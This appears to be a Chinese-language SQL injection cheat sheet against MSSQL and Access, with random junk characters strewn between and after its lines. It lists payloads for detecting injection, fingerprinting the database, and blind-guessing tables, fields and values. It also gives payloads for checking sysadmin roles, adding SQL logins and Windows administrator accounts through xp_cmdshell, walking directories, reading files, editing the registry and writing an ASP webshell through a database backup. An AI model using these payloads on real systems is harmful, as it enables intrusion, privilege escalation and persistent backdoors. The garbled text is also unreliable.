1.判断是否有注入;and 1=1 ;and 1=2 Fa;CWyt
2.初步判断是否是mssql ;and user>0 pIh@!C
F6fm{
3.注入参数是字符'and [查询条件] and ''=' F'Wef11Yz
{}.c.W+
4.搜索时没过滤参数的'and [查询条件] and '%25'=' Z{e5 OJ
'SuYNA)
5.判断数据库系统 1sgoT f%
&)wQ|{P~k
;and (select count(*) from sysobjects)>0 mssql f+)F-3
;z&p(e
;and (select count(*) from msysobjects)>0 access l
lQ<x
jx-W$@
K%Rx5 S
' rXkTm1{
6.猜数据库 ;and (select Count(*) from [数据库名])>0 r^]0LJ
h5Z%|J>;0
7.猜字段 ;and (select Count(字段名) from 数据库名)>0 ;ymUMQ%;/
h'N,oDB)
8.猜字段中记录长度 ;and (select top 1 len(字段名) from 数据库名)>0 k6dSj>F>
}+u<^7$g|
9.(1)猜字段的ascii值(access) j|
257D
Lrz>00(*4
;and (select top 1 asc(mid(字段名,1,1)) from 数据库名)>0 DTJ~.
wD*_S}]
(2)猜字段的ascii值(mssql) =!p6}5Z
YWm:#{n.
;and (select top 1 unicode(substring(字段名,1,1)) from 数据库名)>0 Ble <n6
h883pe=
10.测试权限结构(mssql) Qx
{/izc
e#08,wgW
yy%J{;
NjMo"1d
;and 1=(select IS_SRVROLEMEMBER('sysadmin'));-- 7^:s/xHO*
or(Z-8a_
;and 1=(select IS_SRVROLEMEMBER('serveradmin'));-- PI }A')Nq.
^D\#*pIO
;and 1=(select IS_SRVROLEMEMBER('setupadmin'));-- ~(FyGB}
fa$ Fo(.
;and 1=(select IS_SRVROLEMEMBER('securityadmin'));-- &ts!D!Hj
'!Q[+@$
;and 1=(select IS_SRVROLEMEMBER('diskadmin'));-- 5<&<61[A
8pPAEf
;and 1=(select IS_SRVROLEMEMBER('bulkadmin'));-- qG~O]($
c1Dhx,]ad
;and 1=(select IS_MEMBER('db_owner'));-- 1z*] MYU
3{
`fT5]U
u0N1+-6kr+
6n<:ph,h;
11.添加mssql和系统的帐户 zaX30e:R
>\MV/!W
;exec master.dbo.sp_addlogin username;-- ;o#dmG
;exec master.dbo.sp_password null,username,password;-- .O~)zMx
(3W<yAM+
;exec master.dbo.sp_addsrvrolemember sysadmin username;-- [ UQzCqV
*-gS u
;exec master.dbo.xp_cmdshell 'net user username password +
_4.fT
/workstations:*/times:all/passwordchg:yes /passwordreq:yes /active:yes /add';-- j#o0y5S
qA&N6`
;exec master.dbo.xp_cmdshell 'net user username password /add';-- fNQ.FAK":
FJ~Dg3F1
;exec master.dbo.xp_cmdshell 'net localgroup administrators username /add';-- xpUaFb
-<qci3Ba}
, Lhgv1
wS8qua
12.(1)遍历目录 nIXq2TzJ
RaG-9gujI
;create table dirs(paths varchar(100), id int) +xB!T1pD
3_ObCsJ#,
;insert dirs exec master.dbo.xp_dirtree 'c:\' lO)p
t[7YMk
;and (select top 1 paths from dirs)>0 O[Nc$dc
wB"&K;t
;and (select top 1 paths from dirs where paths not in('上步得到的paths'))>) 4km=KOx[
~^:/t<N
F@&q4whaVD
OyFBM>6gh
(2)遍历目录 ^-mz!{
=|=9\3po
;create table temp(id nvarchar(255),num1 nvarchar(255),num2 nvarchar(255),num3 nvarchar(255));-- X8F _Mb*
;insert temp exec master.dbo.xp_availablemedia;-- 获得当前所有驱动器 `[7&tOvSk
X,^J3Ek>O
;insert into temp(id) exec master.dbo.xp_subdirs 'c:\';-- 获得子目录列表 i3N _wv{
qH$G_R#)8B
;insert into temp(id,num1) exec master.dbo.xp_dirtree 'c:\';-- 获得所有子目录的目录树构 fq_ 6xs
EcFYP"{U
;insert into temp(id) exec master.dbo.xp_cmdshell 'type c:\web\index.asp';-- 查看文件的内容 J*qepq`_
HIeWgw^"
}kGJ)zh
miEfxim
13.mssql中的存储过程 =]&R6P>
J7_'@zU
xp_regenumvalues 注册表根键, 子键 A'p"FYlCW
Peh(*D{
;exec xp_regenumvalues 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion\Run' 以多个记录集方式返回所有键值 ~cQP4
kBD]
?}lgwKBHl;
xp_regread 根键,子键,键值名 qFt%{~a
S
}yC ve
;exec xp_regread n SmYa7
tk2B\}6
'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','CommonFilesDir' 返回制定键的值 H+\rCefba
d8/lEmv[
xp_regwrite 根键,子键, 值名, 值类型, 值 SO3WOR`3
hPP+lqY[
值类型有2种REG_SZ 表示字符型,REG_DWORD 表示整型 8&f}GdZh
+u:8#!X$RD
;exec xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','TestValueName','reg_sz','hello' 写入注册表 'l)@MXbGL
I
Yj\t?,0
xp_regdeletevalue 根键,子键,值名 FK;\Nce&
x]J{EA{+
exec xp_regdeletevalue 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','TestValueName' 删除某个值 XBdC/DM[
'&'?
S
xp_regdeletekey 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion\Testkey' 删除键,包括该键下所有值 ;F"W6G
'P39^rb
tbl!{Qwx
6t<~. 2'
14.mssql的backup创建webshell Ilsh
Jo
`yNNpSdS1
use model )d_)CuUBe
]Y}faW(&Y
create table cmd(str image); I?Hj,lN
(SU*fD!t
insert into cmd(str) values ('');
YNH>^cD1
t-3wjS1v
backup database model to disk='c:\l.asp'; ?9
m3y0
Y+F$]!hw
GL9R
5
C5*j0}
15.mssql内置函数 P2!@^%o
wwmMpK}f
;and (select @@version)>0 获得Windows的版本号 LPvyfD;Zy
*.~hn5Y|?
;and user_name()='dbo' 判断当前系统的连接用户是不是sa )j]S;Mr
Lb{~a_c
;and (select user_name())>0 爆当前系统的连接用户 m{I_E
G
6^s]2mMfk
;and (select db_name())>0 得到当前连接的数据库 Z#3wMK~
8pg?g'A~}
Zj[Bm\8
)|q,RAn
16.简洁的webshell RHz'Dz>0
VsNqYFHes&
use model ?so3Kj6H
T<mk98CdE
create table cmd(str image); '[{M"S
4ehajK
insert into cmd(str) values (''); &:nWZ!D
mAX]m 1s
backup database model to disk='g:\wwwtest\l.asp';